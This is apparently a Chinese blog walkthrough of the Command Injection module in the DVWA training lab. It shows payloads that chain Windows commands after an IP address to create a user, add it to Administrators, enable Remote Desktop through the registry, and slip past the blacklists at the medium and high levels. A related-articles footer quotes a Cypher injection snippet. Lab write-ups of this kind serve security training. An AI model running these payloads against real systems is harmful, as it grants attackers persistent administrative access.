首页 > 其他分享 >DVWA靶场 之Command Injection。

DVWA靶场 之Command Injection。

时间:2024-03-17 14:29:04浏览次数:21  
标签:语句 127.0 0.1 DVWA 连接 Command Injection net

说明:这个靶场在虚拟机中,用主机通过靶场的漏洞远程连接虚拟机。

命令拼接:

|:管道符,直接执行后面的语句。

||:前面的语句出错时才执行后面的语句。

&:无论前面的语句是真是假都会执行后面的语句。

&&:前面的语句为真才执行后面的语句。

DVWA Security:Low

创建用户c: 127.0.0.1&net user c /add

显示所有用户:127.0.0.1&net user

将c添加到管理员组: 127.0.0.1&net localgroup Administrators c /add

激活用户: 127.0.0.1|net user c /active:yes

将名为fDenyTSConnections 的注册表项设为 0,以允许远程桌面连接:127.0.0.1 | add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

查看计算机名以进行远程连接:127.0.0.1|hostname

现在就可以进行远程连接了。

正常来说需要密码才能连接,因为这个用户没有设密码,但是又需要密码才能连接,所以连接不了。现实中的电脑大多数都有密码,所以尽管发现了可以远程连接的漏洞大概率也还是要进行一次密码枚举才能够真正远程连接上别人的电脑。

分析源代码:

DVWA Security:medium

虽然这一关进行了黑名单验证,但是黑名单很不完整,所以基本不影响操作。

DVWA Security:high

虽然这一级有着更完整的黑名单验证,但其实还是换汤不换药。请注意我的代码127.0.0.1|net user,这里的管道符“|”左右两边没有空格,当它进行验证的时候会把“127.0.0.1|net”作为一个整体而不会单独验证这个管道符“|”。所以这个黑名单验证了个寂寞。

标签:语句,127.0,0.1,DVWA,连接,Command,Injection,net
From: https://blog.csdn.net/lxz021202/article/details/136781558

相关文章

  • 04ifconfig命令报错:command not found 解决方法
    在Linux系统下,当要查询当前主讲的ip地址时,输入命令ifconfig,但是却出了commandnotfound的提示ifconfig命令失败,说明没有将ipconfig命令配置到环境变量,需要进行如下配置使用管理员权限运行以下命令vi/etc/profile#在profile文件里面PATH=$PATH:/sbinexportPATH=$......
  • fastadmin命令行模式--command
    1.引入命令行文件fastadmin/application/command.php 2.在该位置新建执行文件此处以menu作说明protectedfunctionconfigure(){$this->setName('命令')->addOption('参数1','参数简称',Option::VALUE_REQUIRED(必填),'参数说明',默认值......
  • DVWA 靶场搭建
    文章目录1DVWA简介2DVWA安装1DVWA简介DVWA(DamnVulnerableWebApp)是一个基于“PHP+MySQL”搭建的Web应用程序,皆在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助Web开发者更好地理解Web应用安全防范的过程DVWA一共包括十个模块:(1)BruceForc......
  • 详解Go程序添加远程调用tcpdump功能,exec.Command("sh", "-c", "ps -elf | grep xxx |
    摘自:https://www.jb51.net/article/249001.htm这篇文章主要介绍了go程序添加远程调用tcpdump功能,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下 最近开发的telemetry采集系统上线了。听起来高大上,简单来说就是一个grpc/udp服务端,用......
  • golang,再也不用管道了,exec.Command("bash", "-c", "ps -elf | grep xxx")
    摘自:https://www.jb51.net/article/249001.htmfuncSystem_CmdCombinedOutput(cmd_linestring)([]byte,error){mutex_exec.Lock()defermutex_exec.Unlock()//old_handler:=C.set_SIGCHLD_DFL()//自己实现,用c语言保存当前的信号屏蔽字//def......
  • 【转】Command Pattern in Go (Golang)
     原文: https://www.sohamkamani.com/golang/command-pattern/ packagemainimport"fmt"//TherestaurantcontainsthetotaldishesandthetotalcleaneddishestypeRestaurantstruct{ TotalDishesint CleanedDishesint}//`NewRestaurant......
  • Total Commander(TC)批量切换标签的方法
      2人赞同了该文章TC能否批量切换标签?比如:工作场景下,打开多个与工作场景相关的文件夹标签;学习场景下,需要打开多个与学习场景相关的文件夹标签。这些文件夹标签分别组成【工作标签组】和【学习标签组】。能否实现【工作标签组】和【学习标签组】之间的切换呢?答案是肯......
  • mingw64 cmake build command
    mingw64cmake buildcommand cmake_minimum_required(VERSION3.5)project(00_qt_helloVERSION0.1LANGUAGESCXX)set(CMAKE_INCLUDE_CURRENT_DIRON)set(CMAKE_AUTOUICON)set(CMAKE_AUTOMOCON)set(CMAKE_AUTORCCON)set(CMAKE_CXX_STANDARD11)set(CMAKE......
  • WPF 解决 CommandParameter 参数不更新问题
    参考https://devbox.cn/p/WPFCommandParame_71b81418.html环境软件/系统版本说明WindowsWindows10专业版22H219045.4046MicrosoftVisualStudioMicrosoftVisualStudioCommunity2022(64位)-17.6.5Microsoft.NetSDK8.0.101手动安装Mic......
  • Neo4j Exfiltrate data ,Injection
    InjectionsHowtoinjectInjectablequeryInjectionMacth(o)whereo.Id='{input}''OR1=1with0as_l00{...}RETURN1//MATCH(o)wehre'{input}'=o.Id'='{...}with0as_......